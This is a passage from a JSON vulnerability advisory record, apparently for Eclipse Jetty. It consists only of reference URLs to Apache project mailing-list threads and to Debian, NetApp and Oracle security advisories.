"WEB", "url": "https://lists.apache.org/thread.html/rc0e35f4e8a8a36127e3ae7a67f325a3a6a4dbe05034130fb04b6f3b6@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc1de630c6ed9a958d9f811e816d6d8efb6ca94aed0869bc5cda9d7f8%40%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc1de630c6ed9a958d9f811e816d6d8efb6ca94aed0869bc5cda9d7f8@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc2b603b7fa7f8dbfe0b3b59a6140b4d66868db3bf4b29d69a772d72a%40%3Cdev.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc2b603b7fa7f8dbfe0b3b59a6140b4d66868db3bf4b29d69a772d72a@%3Cdev.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc91c405c08b529b7292c75d9bd497849db700a1297fe3432990f6774%40%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc91c405c08b529b7292c75d9bd497849db700a1297fe3432990f6774@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8ed14a84656fa0bb8df3bf9373c5be80f47ceac1e2ff068ee734fdb3%40%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8ed14a84656fa0bb8df3bf9373c5be80f47ceac1e2ff068ee734fdb3@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8eea4c7797e701f6494c72942dd89f471cda4c2c6e9abbaf05d113d8%40%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8eea4c7797e701f6494c72942dd89f471cda4c2c6e9abbaf05d113d8@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8f5b144e7a7c2b338f01139d891abbaba12a8173ee01110d21bd0b4d%40%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8f5b144e7a7c2b338f01139d891abbaba12a8173ee01110d21bd0b4d@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8fee46fd9f1254150cc55eecf1ea6a448fca1f7cf1d1e7f9c4803fdb%40%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8fee46fd9f1254150cc55eecf1ea6a448fca1f7cf1d1e7f9c4803fdb@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r94230f46b91c364d39922a8ba0cfe12b8dba1556b14792719a7d921f%40%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r94230f46b91c364d39922a8ba0cfe12b8dba1556b14792719a7d921f@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r942e21ee90e2617a00a08b17b0ac2db961959bec969b91df61584d38%40%3Cdev.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r942e21ee90e2617a00a08b17b0ac2db961959bec969b91df61584d38@%3Cdev.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r964d226dd08527fddd7a44410c50daa9d34d398e5c4793f1d7e19da8%40%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r964d226dd08527fddd7a44410c50daa9d34d398e5c4793f1d7e19da8@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r96ef6d20c5bd3d42dab500bac56a427e1dce00cf85b083987617643d%40%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r96ef6d20c5bd3d42dab500bac56a427e1dce00cf85b083987617643d@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r990e0296b188d4530d1053882f687fa4f938f108425db2999a180944%40%3Ccommits.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r990e0296b188d4530d1053882f687fa4f938f108425db2999a180944@%3Ccommits.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9b46505868794fba04d401956304e63e4d8e39bdc118d30e5e87dcd9%40%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9b46505868794fba04d401956304e63e4d8e39bdc118d30e5e87dcd9@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9d7a86fb0b45e5b1855d4df83a5820eef813d55eae3edf224f3d5055%40%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9d7a86fb0b45e5b1855d4df83a5820eef813d55eae3edf224f3d5055@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9f571b086965b35d4e91e47fb67c27b42b62762248b4900ba723599f%40%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9f571b086965b35d4e91e47fb67c27b42b62762248b4900ba723599f@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra09a653997cbf10aab8c0deabc0fa49f5a8a8ce4305ce9089b98485f%40%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra09a653997cbf10aab8c0deabc0fa49f5a8a8ce4305ce9089b98485f@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra1c234f045871827f73e4d68326b067e72d3139e109207345fa57d9e%40%3Cdev.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra1c234f045871827f73e4d68326b067e72d3139e109207345fa57d9e@%3Cdev.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re4ae7ada52c5ecfe805eb86ddc0af399ec8a57bfb0d8c632b8723b88%40%3Cdev.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re4ae7ada52c5ecfe805eb86ddc0af399ec8a57bfb0d8c632b8723b88@%3Cdev.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re4e67541a0a25a8589e89f52f8cd163c863fe04b59e048f9f1a04958%40%3Ccommits.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re4e67541a0a25a8589e89f52f8cd163c863fe04b59e048f9f1a04958@%3Ccommits.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re86a6ba09dc74e709db843e3561ead923c8fd1cba32343656dd8c44b%40%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re86a6ba09dc74e709db843e3561ead923c8fd1cba32343656dd8c44b@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re9214a4232b7ae204288c283bcee4e39f07da6cc34798e9217ba4eb6%40%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re9214a4232b7ae204288c283bcee4e39f07da6cc34798e9217ba4eb6@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/reb75282901d0969ba6582725ce8672070715d0773f6ff54dedd60156%40%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/reb75282901d0969ba6582725ce8672070715d0773f6ff54dedd60156@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ree677ff289ba9a90850f2e3ba7279555df1a170263ba39c5272db236%40%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ree677ff289ba9a90850f2e3ba7279555df1a170263ba39c5272db236@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf0181750e321518c8afa8001e0529d50a9447714ef4f58d98af57904%40%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf0181750e321518c8afa8001e0529d50a9447714ef4f58d98af57904@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf273267fa2e49314643af3141cec239f97d41de8a59be4ef7e10c65a%40%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf273267fa2e49314643af3141cec239f97d41de8a59be4ef7e10c65a@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf31e24700f725ef81bc5a2e0444a60e1f295ed0a54c0098362a7bdfa%40%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf31e24700f725ef81bc5a2e0444a60e1f295ed0a54c0098362a7bdfa@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfa34d2a3e423421a4a1354cf457edba2ce78cee2d3ebd8aab151a559%40%3Cdev.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfa34d2a3e423421a4a1354cf457edba2ce78cee2d3ebd8aab151a559@%3Cdev.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfa8879a713480b206c152334419499e6af0878c36217abcc9ab4f0d1%40%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfa8879a713480b206c152334419499e6af0878c36217abcc9ab4f0d1@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00045.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20201218-0003" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcbc408088ae99dc3167ea293a562a3a9a7295a20e9a1bfc93e43ae1b%40%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcbc408088ae99dc3167ea293a562a3a9a7295a20e9a1bfc93e43ae1b@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rccc7ba8c51d662e13496df20466d27dbab54d7001e9e7b2f31468a9e%40%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rccc7ba8c51d662e13496df20466d27dbab54d7001e9e7b2f31468a9e@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rce9e232a663d8405c003fe83d5c86c27d1ed65561f3690e824717bc4%40%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rce9e232a663d8405c003fe83d5c86c27d1ed65561f3690e824717bc4@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcf7b5818f71bb97fd695eb0f54f8f4f69e15cc5f9ec761ea8be0d0d3%40%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcf7b5818f71bb97fd695eb0f54f8f4f69e15cc5f9ec761ea8be0d0d3@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd0e44e8ef71eeaaa3cf3d1b8b41eb25894372e2995ec908ce7624d26%40%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd0e44e8ef71eeaaa3cf3d1b8b41eb25894372e2995ec908ce7624d26@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd20651e102cb6742a9d9322ea7b5fc3ab60a7ffecb50fa9157cbf176%40%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd20651e102cb6742a9d9322ea7b5fc3ab60a7ffecb50fa9157cbf176@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd8e24a3e482e5984bc8c5492dc790413e4fdc1234e3debb94515796b%40%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd8e24a3e482e5984bc8c5492dc790413e4fdc1234e3debb94515796b@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd9a960429741406f6557fa344a13d50a0c9976dac2e4c46bb54b32d7%40%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd9a960429741406f6557fa344a13d50a0c9976dac2e4c46bb54b32d7@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdbdbb4e51f8857e082b464cd128decd7263cf0fb8557f12993562c56%40%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdbdbb4e51f8857e082b464cd128decd7263cf0fb8557f12993562c56@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdde0ad0a03eec962c56b46e70e225918ea2368dcc3fd3488741fad53%40%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdde0ad0a03eec962c56b46e70e225918ea2368dcc3fd3488741fad53@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rde11c433675143d8d27551c3d9e821fe1955f1551a518033d3716553%40%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rde11c433675143d8d27551c3d9e821fe1955f1551a518033d3716553@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re014afaa14f4df9d33912ab64dc57249e1c170c7448d7175c6d014ff%40%3Cissues.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re014afaa14f4df9d33912ab64dc57249e1c170c7448d7175c6d014ff@%3Cissues.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re03a566114435a8cc8eb72158242b0f560c5eeccbb4ee98d22de8373%40%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re03a566114435a8cc8eb72158242b0f560c5eeccbb4ee98d22de8373@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re3918edd403b0d3857a13ef2ccf3d2bc0231f3b8758e2a5777ea1cd3%40%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re3918edd403b0d3857a13ef2ccf3d2bc0231f3b8758e2a5777ea1cd3@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2a57c7bbf36afc87f8ad9e1dd2f53a08e85a1b531283fc2efce4fe17@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2f168fd22c071bdd95ec696e45d2a01e928b9fcadbe94fbabeb1549d%40%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2f168fd22c071bdd95ec696e45d2a01e928b9fcadbe94fbabeb1549d@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2fda4dab73097051977f2ab818f75e04fbcb15bb1003c8530eac1059%40%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2fda4dab73097051977f2ab818f75e04fbcb15bb1003c8530eac1059@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2ffe719224cbe5897f2d06dd22fc77fa12377c39efe9de0c3bf3f837%40%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2ffe719224cbe5897f2d06dd22fc77fa12377c39efe9de0c3bf3f837@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r306c8e5aad1b9afc0c9278430fb571950fbb3ab7dd5d369eb618ffa4%40%3Cissues.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r306c8e5aad1b9afc0c9278430fb571950fbb3ab7dd5d369eb618ffa4@%3Cissues.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r32a25679d97bf5969d130f8e9b3a3fc54110095397d89952e93dbeb0%40%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r32a25679d97bf5969d130f8e9b3a3fc54110095397d89952e93dbeb0@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r352e40ca9874d1beb4ad95403792adca7eb295e6bc3bd7b65fabcc21%40%3Ccommits.samza.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r352e40ca9874d1beb4ad95403792adca7eb295e6bc3bd7b65fabcc21@%3Ccommits.samza.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3554a4f192db6008c03f2c6c3e0f1691a9b0d615ce955ef67a876ff7%40%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3554a4f192db6008c03f2c6c3e0f1691a9b0d615ce955ef67a876ff7@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3807b1c54066797c4870e03bd2376bdcce9c7c4e6143499f53cd9ca2%40%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3807b1c54066797c4870e03bd2376bdcce9c7c4e6143499f53cd9ca2@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r380e9257bacb8551ee6fcf2c59890ae9477b2c78e553fa9ea08e9d9a%40%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r380e9257bacb8551ee6fcf2c59890ae9477b2c78e553fa9ea08e9d9a@%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r391d20ab6ec03d6becc7a9f0c5e0f45a7ad8af6b996ae0a49839f6bd%40%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r391d20ab6ec03d6becc7a9f0c5e0f45a7ad8af6b996ae0a49839f6bd@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r39f1b1be8e5c0935f7c515eedf907909474bad15185125daacb36d50%40%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r39f1b1be8e5c0935f7c515eedf907909474bad15185125daacb36d50@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3b7c8bc7a1cb8acdcf7753f436564d289d22f2906e934d1b11de3a40%40%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3b7c8bc7a1cb8acdcf7753f436564d289d22f2906e934d1b11de3a40@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3d43529452c5a16338e8267eb911e8aedc64c3241624302e673961c1%40%3Cdev.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3d43529452c5a16338e8267eb911e8aedc64c3241624302e673961c1@%3Cdev.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r46589f4228aabd5fb16135ff5bef0f77f06cdef64f9785ac3349fa02%40%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "PACKAGE", "url": "https://github.com/eclipse/jetty.project" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r00858fe27ee35ac8fa0e1549d67e0efb789d63b791b5300390bd8480%40%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r00858fe27ee35ac8fa0e1549d67e0efb789d63b791b5300390bd8480@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r01806ad8c9cb0590584baf5b1a60237ad92e4ad5bba082ca04d98179%40%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r01806ad8c9cb0590584baf5b1a60237ad92e4ad5bba082ca04d98179@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r05b7ffde2b8c180709e14bc9ca036407bea3ed9f09b32c4705d23a4a%40%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r05b7ffde2b8c180709e14bc9ca036407bea3ed9f09b32c4705d23a4a@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r078c1203e48089b2c934b9f86b61bebe8c049e0ea6273b124f349988%40%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r078c1203e48089b2c934b9f86b61bebe8c049e0ea6273b124f349988@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0d2de2ab5558da68b504bd30db74da1d97dc152a857f5b7e462288ab%40%3Cissues.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0d2de2ab5558da68b504bd30db74da1d97dc152a857f5b7e462288ab@%3Cissues.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r153fbefc27a1b2033692f32ef728ca909a7c7bcc1d21b6c35b38bdd5%40%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r153fbefc27a1b2033692f32ef728ca909a7c7bcc1d21b6c35b38bdd5@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r15500b77c52390e2ec048cea4a6b45edf907ea61cd13259193ff8601%40%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r15500b77c52390e2ec048cea4a6b45edf907ea61cd13259193ff8601@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r186748e676e5aeb4eb603361e6367555ae4daecbde55cfd69fa68ec6%40%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r186748e676e5aeb4eb603361e6367555ae4daecbde55cfd69fa68ec6@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1dd302323c6fe1a542d0371de66a484918fa6c2831ae70d924974bea%40%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1dd302323c6fe1a542d0371de66a484918fa6c2831ae70d924974bea@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r22776d06582985cca5bd2a92519a2b13b4cae2d8e087318da03c036d%40%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r22776d06582985cca5bd2a92519a2b13b4cae2d8e087318da03c036d@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r23ce6b8965e30808daa77a80fcd69833b1fc632d80465d0419eff619%40%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r23ce6b8965e30808daa77a80fcd69833b1fc632d80465d0419eff619@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r25a47cd06750ebb4b0f23a9b7a57c209702c8566a4c970a41ac088df%40%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r25a47cd06750ebb4b0f23a9b7a57c209702c8566a4c970a41ac088df@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2a541f08bf5f847394297c13a5305c2f76c11e46504ce2a49653890a%40%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2a541f08bf5f847394297c13a5305c2f76c11e46504ce2a49653890a@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2a57c7bbf36afc87f8ad9e1dd2f53a08e85a1b531283fc2efce4fe17%40%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r46589f4228aabd5fb16135ff5bef0f77f06cdef64f9785ac3349fa02@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r706562cbbdda569cc556d8a7983d1f9229606e7b51337b820785af26%40%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r706562cbbdda569cc556d8a7983d1f9229606e7b51337b820785af26@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r70940cb30356642f0c49af49259680d6bd866f51c4e8de0f8a498fb0%40%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r70940cb30356642f0c49af49259680d6bd866f51c4e8de0f8a498fb0@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r74ab0f5a5f16ca01eb145403ab753df5b348b8c1656d7c8501d0bfc6%40%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r74ab0f5a5f16ca01eb145403ab753df5b348b8c1656d7c8501d0bfc6@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7669dab41f2b34d56bb67700d869dc9c025ff72e9468204799f5ac29%40%3Ccommits.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7669dab41f2b34d56bb67700d869dc9c025ff72e9468204799f5ac29@%3Ccommits.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r769e1ba36c607772f7403e7ef2a8ae14d9ddcab4a844f9b28bcf7959%40%3Cdev.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r769e1ba36c607772f7403e7ef2a8ae14d9ddcab4a844f9b28bcf7959@%3Cdev.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7d37d33f2d68912985daf40203182e3d86f3e81266b7a7f350689eeb%40%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7d37d33f2d68912985daf40203182e3d86f3e81266b7a7f350689eeb@%3Cjira.kafka.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r81f82ab8ecb83568bafbecf9ce0e73be73980ac1e2af6baf0f344a59%40%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r81f82ab8ecb83568bafbecf9ce0e73be73980ac1e2af6baf0f344a59@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r821bbffb64da0f062b4e72d1aa600b91e26bc82a28298ab159121215%40%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r821bbffb64da0f062b4e72d1aa600b91e26bc82a28298ab159121215@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r850d1d0413716e8ba6d910cae7b01a0e560636e17d664769b5080ca5%40%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r850d1d0413716e8ba6d910cae7b01a0e560636e17d664769b5080ca5@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r870bc5e6e354c3e28ea029cb5726c9e8dd2b88cb0f5f7de1d4e3133d%40%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r870bc5e6e354c3e28ea029cb5726c9e8dd2b88cb0f5f7de1d4e3133d@%3Creviews.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8b2271909dabb45f0f1482ef35ffe106ae4b0cf8e877eb514e9cd421%40%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8b2271909dabb45f0f1482ef35ffe106ae4b0cf8e877eb514e9cd421@%3Cissues.hbase.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8be8c6f0e404a3179d988eb8afed03ede5f2d5ce986d3f709fb82610%40%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8be8c6f0e404a3179d988eb8afed03ede5f2d5ce986d3f709fb82610@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": 